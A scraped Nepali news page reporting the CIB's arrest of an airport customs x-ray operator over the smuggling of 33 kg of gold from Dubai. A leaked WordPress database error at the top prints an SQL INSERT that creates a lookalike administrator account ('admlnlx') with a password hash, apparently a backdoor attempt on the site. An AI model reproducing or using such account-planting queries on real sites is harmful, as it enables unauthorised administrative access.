WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4OZiffiqYmMlMu4JYnTawJlQyzKks0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:17:04', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
३३ किलो सुन तस्करीको आरोपमा विमानस्थलका अर्का कर्मचारी प्रहरी फन्दामा – Gaule Khabar

३३ किलो सुन तस्करीको आरोपमा विमानस्थलका अर्का कर्मचारी प्रहरी फन्दामा

३३ किलो सुन तस्करीको आरोपमा विमानस्थलका अर्का कर्मचारी प्रहरी फन्दामा

काठमाडौँ, माघ १०-

३३ किलो सुन तस्करीमा संलग्न रहेको आरोपमा विमानस्थल भन्सारमा कार्यरत ना.सु. पनि प्रहरी फन्दामा परेका छन् । प्रहरीको केन्द्रीय अनुसन्धान ब्युरो (सिआईबी) ले ना.सु. श्यामकृष्ण श्रेष्ठलाई मध्यपुर थिमीस्थित उनकै घरबाट पक्राउ गरेको हो ।

भन्सार शाखाका रेडियो टेक्निसियनका रुपमा कार्यरत श्रेष्ठ विमानबाट आएको सामान जाँच गर्ने एक्सरे मेसिन चलाउँथे ।
गत पुस २१ ग्ते दुबईबाट ठूलो मात्रामा त्रिभुवन अन्तर्राष्ट्रिय विमानस्थलको भन्सारबाट पास भएपछि विमानस्थल बाहिर सिआईबीले बरामद गरेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका